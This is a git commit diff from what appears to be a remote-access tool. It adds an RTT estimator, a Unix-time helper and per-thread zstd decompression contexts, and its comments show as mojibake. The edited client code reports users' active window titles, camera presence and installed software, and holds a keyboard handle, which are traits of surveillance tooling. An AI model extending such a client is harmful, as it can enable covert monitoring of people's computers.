Improve: Master using ZSTD_DCtx and using new RTT

This commit is contained in:
yuanyuanxiang
2025-08-15 03:00:18 +08:00
parent e779fb0b51
commit 4a706d4f7b
8 changed files with 67 additions and 53 deletions

View File

@@ -394,7 +394,7 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer,
HeaderEncType encType = HeaderEncUnknown;
FlagType flagType = CheckHead(szPacketFlag, encType);
if (flagType == FLAG_UNKNOWN) {
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'\n", szPacketFlag);
Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s. Mask: %d'\n", szPacketFlag, maskType);
m_CompressedBuffer->ClearBuffer();
break;
}

View File

@@ -56,7 +56,7 @@ CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject,
#else
m_settings = { 0 };
#endif
m_nNetPing = -1;
m_nNetPing = {};
m_hKeyboard = kb;
}
@@ -521,10 +521,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
if (ulLength > 8) {
uint64_t n = 0;
memcpy(&n, szBuffer + 1, sizeof(uint64_t));
auto system_ms = std::chrono::time_point_cast<std::chrono::milliseconds>(
std::chrono::system_clock::now()
);
m_nNetPing = int((system_ms.time_since_epoch().count() - n) / 2);
m_nNetPing.update_from_sample(GetUnixMs() - n);
}
break;
case CMD_MASTERSETTING:

View File

@@ -91,6 +91,36 @@ private:
}
};
struct RttEstimator {
double srtt = 0.0; // ƽ<><C6BD> RTT (<28><>)
double rttvar = 0.0; // RTT <20><><EFBFBD><EFBFBD> (<28><>)
double rto = 0.0; // <20><>ʱʱ<CAB1><CAB1> (<28><>)
bool initialized = false;
void update_from_sample(double rtt_ms) {
const double alpha = 1.0 / 8;
const double beta = 1.0 / 4;
// ת<><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
double rtt = rtt_ms / 1000.0;
if (!initialized) {
srtt = rtt;
rttvar = rtt / 2.0;
rto = srtt + 4.0 * rttvar;
initialized = true;
}
else {
rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
srtt = (1.0 - alpha) * srtt + alpha * rtt;
rto = srtt + 4.0 * rttvar;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С RTO<54><4F>RFC 6298 <20>Ƽ<EFBFBD> 1 <20>
if (rto < 1.0) rto = 1.0;
}
};
class CKernelManager : public CManager
{
public:
@@ -107,7 +137,7 @@ public:
UINT GetAvailableIndex();
State& g_bExit; // Hide base class variable
MasterSettings m_settings;
int m_nNetPing; // <20><><EFBFBD><EFBFBD>״<EFBFBD><D7B4>
RttEstimator m_nNetPing; // <20><><EFBFBD><EFBFBD>״<EFBFBD><D7B4>
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
int SendHeartbeat() {
for (int i = 0; i < m_settings.ReportInterval && !g_bExit && m_ClientObject->IsConnected(); ++i)
@@ -122,7 +152,7 @@ public:
ActivityWindow checker;
auto s = checker.Check();
Heartbeat a(s, m_nNetPing);
Heartbeat a(s, m_nNetPing.srtt);
a.HasSoftware = SoftwareCheck(m_settings.DetectSoftware);

View File

@@ -795,6 +795,13 @@ typedef struct LOGIN_INFOR
}
}LOGIN_INFOR;
inline uint64_t GetUnixMs() {
auto system_ms = std::chrono::time_point_cast<std::chrono::milliseconds>(
std::chrono::system_clock::now()
);
return system_ms.time_since_epoch().count();
}
// <20>̶<EFBFBD>1024<32>ֽ<EFBFBD>
typedef struct Heartbeat
{
@@ -808,10 +815,7 @@ typedef struct Heartbeat
memset(this, 0, sizeof(Heartbeat));
}
Heartbeat(const std::string& s, int ping = 0) {
auto system_ms = std::chrono::time_point_cast<std::chrono::milliseconds>(
std::chrono::system_clock::now()
);
Time = system_ms.time_since_epoch().count();
Time = GetUnixMs();
strcpy_s(ActiveWnd, s.c_str());
Ping = ping;
memset(Reserved, 0, sizeof(Reserved));

View File

@@ -65,7 +65,7 @@ COLUMNSTRUCT g_Column_Data_Online[g_Column_Count_Online] =
{"操作系统", 120 },
{"CPU", 80 },
{"摄像头", 70 },
{"PING", 70 },
{"RTT", 70 },
{"版本", 90 },
{"安装时间", 120 },
{"活动窗口", 140 },

View File

@@ -64,11 +64,6 @@ IOCPServer::IOCPServer(void)
m_NotifyProc = NULL;
m_OfflineProc = NULL;
#if USING_CTX
m_Cctx = ZSTD_createCCtx();
m_Dctx = ZSTD_createDCtx();
ZSTD_CCtx_setParameter(m_Cctx, ZSTD_c_compressionLevel, ZSTD_CLEVEL);
#endif
}
void IOCPServer::Destroy() {
@@ -133,11 +128,6 @@ IOCPServer::~IOCPServer(void)
m_ulBusyThread = 0;
m_ulKeepLiveTime = 0;
#if USING_CTX
ZSTD_freeCCtx(m_Cctx);
ZSTD_freeDCtx(m_Dctx);
#endif
WSACleanup();
}
@@ -304,6 +294,8 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam)
{
Mprintf("======> IOCPServer WorkThreadProc begin \n");
ZSTD_DCtx* m_Dctx = ZSTD_createDCtx(); // <20><>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
IOCPServer* This = (IOCPServer*)(lParam);
HANDLE hCompletionPort = This->m_hCompletionPort;
@@ -384,7 +376,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam)
{
try
{
This->HandleIO(OverlappedPlus->m_ioType, ContextObject, dwTrans);
This->HandleIO(OverlappedPlus->m_ioType, ContextObject, dwTrans, m_Dctx);
ContextObject = NULL;
}
@@ -405,13 +397,16 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam)
if (n == 0) {
Mprintf("======> IOCPServer All WorkThreadProc done\n");
}
ZSTD_freeDCtx(m_Dctx);
Mprintf("======> IOCPServer WorkThreadProc end \n");
return 0;
}
//<2F>ڹ<EFBFBD><DAB9><EFBFBD><EFBFBD>߳<EFBFBD><DFB3>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>
BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWORD dwTrans)
BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx)
{
BOOL bRet = FALSE;
@@ -421,10 +416,10 @@ BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWOR
bRet = OnClientInitializing(ContextObject, dwTrans);
break;
case IORead:
bRet = OnClientReceiving(ContextObject,dwTrans);
bRet = OnClientReceiving(ContextObject, dwTrans, ctx);
break;
case IOWrite:
bRet = OnClientPostSending(ContextObject,dwTrans);
bRet = OnClientPostSending(ContextObject, dwTrans);
break;
case IOIdle:
Mprintf("=> HandleIO PacketFlags= IOIdle\n");
@@ -443,7 +438,8 @@ BOOL IOCPServer::OnClientInitializing(PCONTEXT_OBJECT ContextObject, DWORD dwTr
}
// May be this function should be a member of `CONTEXT_OBJECT`.
BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc) {
BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc, ZSTD_DCtx* m_Dctx) {
AUTO_TICK(40);
BOOL ret = 1;
try
{
@@ -547,9 +543,9 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP
return ret;
}
BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans)
BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx)
{
if (FALSE == ParseReceivedData(ContextObject, dwTrans, m_NotifyProc)) {
if (FALSE == ParseReceivedData(ContextObject, dwTrans, m_NotifyProc, ctx)) {
RemoveStaleContext(ContextObject);
return FALSE;
}
@@ -559,7 +555,7 @@ BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans
return TRUE;
}
BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength) {
BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength, ZSTD_CCtx* m_Cctx) {
assert(ContextObject);
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>͵<EFBFBD><CDB5><EFBFBD><EFBFBD><EFBFBD>
int cmd = szBuffer[0];

View File

@@ -4,11 +4,6 @@
#include <WinSock2.h>
#pragma comment(lib,"ws2_32.lib")
#include "Server.h"
#if USING_CTX
#include "zstd/zstd.h"
#endif
#include <Mstcpip.h>
#define NC_CLIENT_CONNECT 0x0001
@@ -28,14 +23,12 @@
#define C_FAILED(p) ZSTD_isError(p)
#define C_SUCCESS(p) (!C_FAILED(p))
#define ZSTD_CLEVEL 5
#if USING_CTX
#define Mcompress(dest, destLen, source, sourceLen) ZSTD_compress2(m_Cctx, dest, *(destLen), source, sourceLen)
#define Muncompress(dest, destLen, source, sourceLen) ZSTD_decompressDCtx(m_Dctx, dest, *(destLen), source, sourceLen)
#else
#define Mcompress(dest, destLen, source, sourceLen) ZSTD_compress(dest, *(destLen), source, sourceLen, ZSTD_CLEVEL_DEFAULT)
#define Muncompress(dest, destLen, source, sourceLen) ZSTD_decompress(dest, *(destLen), source, sourceLen)
#endif
#define Mcompress(dest, destLen, source, sourceLen) m_Cctx ? ZSTD_compress2(m_Cctx, dest, *(destLen), source, sourceLen):\
ZSTD_compress(dest, *(destLen), source, sourceLen, ZSTD_CLEVEL_DEFAULT)
#define Muncompress(dest, destLen, source, sourceLen) m_Dctx ? ZSTD_decompressDCtx(m_Dctx, dest, *(destLen), source, sourceLen):\
ZSTD_decompress(dest, *(destLen), source, sourceLen)
class IOCPServer : public Server
{
@@ -55,11 +48,6 @@ protected:
ULONG m_ulCurrentThread;
ULONG m_ulBusyThread;
#if USING_CTX
ZSTD_CCtx* m_Cctx; // ѹ<><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
ZSTD_DCtx* m_Dctx; // <20><>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
#endif
ULONG m_ulKeepLiveTime;
pfnNotifyProc m_NotifyProc;
pfnOfflineProc m_OfflineProc;
@@ -78,9 +66,9 @@ private:
VOID RemoveStaleContext(CONTEXT_OBJECT* ContextObject);
VOID MoveContextToFreePoolList(CONTEXT_OBJECT* ContextObject);
VOID PostRecv(CONTEXT_OBJECT* ContextObject);
BOOL HandleIO(IOType PacketFlags, PCONTEXT_OBJECT ContextObject, DWORD dwTrans);
BOOL HandleIO(IOType PacketFlags, PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx);
BOOL OnClientInitializing(PCONTEXT_OBJECT ContextObject, DWORD dwTrans);
BOOL OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans);
BOOL OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx);
VOID OnClientPreSending(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength);
BOOL OnClientPostSending(CONTEXT_OBJECT* ContextObject, ULONG ulCompressedLength);
int AddWorkThread(int n) {
@@ -173,6 +161,6 @@ public:
typedef CDialogBase DialogBase;
BOOL ParseReceivedData(CONTEXT_OBJECT* ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc);
BOOL ParseReceivedData(CONTEXT_OBJECT* ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc, ZSTD_DCtx *ctx=NULL);
BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength);
BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength, ZSTD_CCtx *ctx=NULL);

View File

@@ -6,7 +6,6 @@
#pragma once
#define USING_ZSTD 1
#define USING_CTX 0
#ifndef _SECURE_ATL
#define _SECURE_ATL 1